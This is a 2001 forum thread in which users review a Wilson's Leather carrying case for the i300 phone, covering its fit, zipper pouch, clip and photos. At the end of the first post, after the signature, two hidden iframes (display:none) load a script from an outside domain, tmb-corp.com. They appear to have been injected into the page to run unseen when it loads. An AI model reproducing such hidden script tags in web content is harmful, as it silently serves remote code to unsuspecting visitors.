+ Reply to Thread

Yet another case...

On my journey to Comdex this week, I happened to pass by a Wilson's Leather store in the airport. I know that they have "generic" cellphone cases, so I decided to check them out.

They have a case in there ($20) that fits the I300 like a glove. It's a perfect fit. It's got a flap that folds over the top and velcros closed. The clip is a metal clip that's woven into the case. Unlike the neoprene case available at Target, this case will actually let you use the headset jack.

It also has a small "zipper pouch" behind the phone. I looked inside, and it's got one slot for a credit card (I managed to stuff three in there) and an ID slot. I was able to get about six business cards in the ID slot. Then, it's got a little zipper change pocket thingy on the other side. Blah. At first, I was thinking that I really could have done without the little "zipper pouch" behind the phone.

But then it hit me. On my first day into Comdex, I wanted to bring both batteries for my phone. The "zipper pouch" was a perfect place for it! I zipped it open, slid the battery in there, and zipped it closed. Awesome! One carrying case for three credit cards, six business cards, my spare battery, and my I300.

They have it in leather, and italian leather.

There are a couple drawbacks. First, the fit on the sides is a bit snug, and I had a tendency to bump one of the "power on" buttons on the side of the phone when I was carrying my laptop and phone on the same side of my body. Secondly, there is no way to see the top display when the phone is in the case. Third, the LCD screen must face outward - the fold-over top is notched for the antenna only on one side. Originally, I was worried about this (I'd prefer to have it face my body) but hey, that's what Sprint's equipment replacement program is for.

-Doug<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by dtoombs; 11-16-2001 at 06:28 AM.

Wannabe Techie

Question Mmm, mmm, good!

Doesn't sound too bad. Actually sounds like the best bet so far. I'll go check it out this weekend. I have to say though, I'm getting pretty attached to the case that came with the i300. I'm not sure if the Wilson's case sounds compact enough to lug around on my hip. I really wish that someone would just make a hard-plastic slip case. Those are my favorite, like warm butter on a breakfast muffin.
    "...my palms are too hairy to hide."
    -Eminem

Can you post some pics please?

Pics

It's a bit big on the hip -- but I take it off when I'm sitting down.
    Attached Thumbnails Attached Thumbnails Yet another case...-p000008f.jpg  

View of the rear "zipper pouch"

A second shot
    Attached Thumbnails Attached Thumbnails Yet another case...-p000009f.jpg  

I checked this out at a Wilson's. Two problems.

The one I visited only had the "Italian" leather or whatever -- it was much cheaper than the regular version. Second, more importantly, it only came with that annoying clip in the back. I didn't want that, nor would it come off -- so I didn't buy it.

Clip

Actually, for me the clip was a plus - I can't stand those "the Clip" swivel thingies. I know, I'm weird - everybody else loves them. I can't explain why, but I just don't care for them. So, when I saw this had a permanent clip attached that was a plus for me. Plus, having the compartment where I can easily carry the spare battery was a big plus too.

Sorry the case didn't work out for you. I guess it's just personal preferences....

(Although now that E&B is supposed to be coming out with something, I might have to ditch this case in the near future!)

-Doug

I'm not the biggest fan of those swivel clips either but if the rest of the case is well-designed (like hopefully the E&B one will be), I can definitely work with it. I did find another case at Target that instead of the swivel clip has a hard builtin spring clip where you just slip it on to your belt, no moving parts and the case is open on top so you can see the top LCD. The case fits the I300 pretty tight but you can still slip the phone in and out alright...it'll do until E&B comes out with theirs.